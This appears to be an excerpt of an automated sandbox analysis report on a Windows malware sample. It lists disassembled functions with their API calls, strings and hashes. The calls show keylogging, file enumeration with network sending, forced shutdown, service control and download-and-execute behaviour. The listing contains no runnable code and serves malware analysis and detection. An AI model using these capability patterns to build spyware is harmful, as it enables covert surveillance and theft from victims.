                                                                                          • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                                                                          Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                          • GetLastError.KERNEL32 ref: 00415CDB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 3534403312-3733053543
                                                                                          • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                          • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                                                                          • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                          • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                                                                          Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00408393
                                                                                            • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                                                            • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                                                                            • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                                                                            • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                                                                          • FindClose.KERNEL32(00000000), ref: 004086F4
                                                                                            • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                                                            • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                          • String ID:
                                                                                          • API String ID: 1824512719-0
                                                                                          • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                                                          • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                                                                          • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                                                                          • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                                                                          Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0040949C
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                          • GetKeyState.USER32(00000010), ref: 004094B8
                                                                                          • GetKeyboardState.USER32(?), ref: 004094C5
                                                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                          • String ID:
                                                                                          • API String ID: 3566172867-0
                                                                                          • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                                                                          • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                                                                          • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                                                                          • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                                                                          Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                          • String ID:
                                                                                          • API String ID: 276877138-0
                                                                                          • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                                                                          • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                                                                          • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                                                                          • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                                                                          Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                          • String ID: H"G$`'G$`'G
                                                                                          • API String ID: 341183262-2774397156
                                                                                          • Opcode ID: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                                                                                          • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                                                                          • Opcode Fuzzy Hash: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                                                                                          • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                                                                          Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                            • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                            • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                            • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                            • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                          • String ID: PowrProf.dll$SetSuspendState
                                                                                          • API String ID: 1589313981-1420736420
                                                                                          • Opcode ID: 485f73e636cde54b00929bf3910efae957862298eb284d08d9347c6df5f92bed
                                                                                          • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                                                                          • Opcode Fuzzy Hash: 485f73e636cde54b00929bf3910efae957862298eb284d08d9347c6df5f92bed
                                                                                          • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                                                                          Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0044F6B5
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0044F6DE
                                                                                          • GetACP.KERNEL32 ref: 0044F6F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                          • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                                                                          • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                                                                          • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                                                                          Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                                                          • wsprintfW.USER32 ref: 0040A13F
                                                                                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EventLocalTimewsprintf
                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                          • API String ID: 1497725170-248792730
                                                                                          • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                                                                          • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                                                                          • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                                                                          • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                                                                          Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                                                                                          • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                                                                                          • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                          • String ID: SETTINGS
                                                                                          • API String ID: 3473537107-594951305
                                                                                          • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                                          • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                                                                                          • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                                                                                          • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                                                                                          Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 004087A5
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                                                          • String ID:
                                                                                          • API String ID: 1157919129-0
                                                                                          • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                                                                          • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                                                                          • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                                                                          • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                                                                          Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                                                                          • GetUserDefaultLCID.KERNEL32 ref: 0044F8FC
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0044F9CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                          • String ID:
                                                                                          • API String ID: 745075371-0
                                                                                          • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                                          • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                                                                          • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                                                                          • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                                                                          Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0040784D
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                          • String ID:
                                                                                          • API String ID: 1771804793-0
                                                                                          • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                                                                          • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                                                                          • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                                                                                          • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                                                                          Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                                                                            • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                                                                            • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 1735047541-0
                                                                                          • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                                                                          • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                                                                          • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                                                                                          • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                                                                          Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: A%E$A%E
                                                                                          • API String ID: 0-137320553
                                                                                          • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                                                                          • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                                                                                          • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                                                                          • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                                                                                          Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                                                                            • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                                                                            • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                                                                                            • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                          • API String ID: 4127273184-3576401099
                                                                                          • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                                                                          • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                                                                          • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                                                                                          • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                                                                          Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0044EF9A
                                                                                          • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                                                                          • _wcschr.LIBVCRUNTIME ref: 0044F038
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0044F0DB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 4212172061-0
                                                                                          • Opcode ID: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
                                                                                          • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                                                                          • Opcode Fuzzy Hash: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
                                                                                          • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                                                                          Function 004468DC Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 004468EC
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • GetTimeZoneInformation.KERNEL32 ref: 004468FE
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,0046F754,000000FF,?,0000003F,?,?), ref: 00446976
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,0046F7A8,000000FF,?,0000003F,?,?,?,0046F754,000000FF,?,0000003F,?,?), ref: 004469A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                          • String ID:
                                                                                          • API String ID: 806657224-0
                                                                                          • Opcode ID: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
                                                                                          • Instruction ID: 2b7d8a9ac893eb444b3138181a21c3719d458e34cf104297cae44ef8c21a1482
                                                                                          • Opcode Fuzzy Hash: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
                                                                                          • Instruction Fuzzy Hash: 4F31A5B1904245EFDB11DF69DC80469BBB8FF0671171602BFE090972A1D7B49D04DB5A
                                                                                          Function 004063C6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222filenetworkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
